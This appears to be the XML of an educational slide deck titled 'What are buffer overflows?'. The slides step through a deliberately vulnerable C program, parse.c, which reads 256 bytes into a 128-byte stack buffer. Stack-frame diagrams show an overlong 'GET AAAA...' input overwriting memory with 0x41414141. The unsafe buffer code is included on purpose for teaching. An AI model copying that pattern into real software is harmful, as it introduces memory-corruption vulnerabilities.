        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0xbfef20dc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0x00000000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0x41</a:t>
                      </a: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414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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168807"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000002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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2963016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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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7364236" y="2586574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04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6376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What are buffer overflows?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017446"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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48918"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0xbfef20dc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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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423247"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000003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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2963016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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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7364236" y="2586574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41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6376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What are buffer overflows?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447831"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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131385"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0xbfef20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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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504579"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000004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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2774856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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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7364236" y="2586574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342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6376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What are buffer overflows?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837720"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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375973"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0xbfef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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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946359"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000005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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1901188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3929" y="1613624"/>
            <a:ext cx="87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4715524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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8132" y="6287644"/>
            <a:ext cx="96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Uh oh….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Right Arrow 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2774856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7364236" y="2586574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371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6376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What are buffer overflows?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30933"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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313421"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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227075"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000005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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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4715524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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8132" y="6287644"/>
            <a:ext cx="96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Uh oh….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Right Arrow 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2774856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7364236" y="2586574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678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6376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What are buffer overflows?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691961"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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503015"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x0804a008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0xbffff778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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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118070"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x0000000d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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="2429899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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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8132" y="6287644"/>
            <a:ext cx="96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Uh oh….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7364236" y="2586574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358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */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0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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455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6376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What are buffer overflows?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25481"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
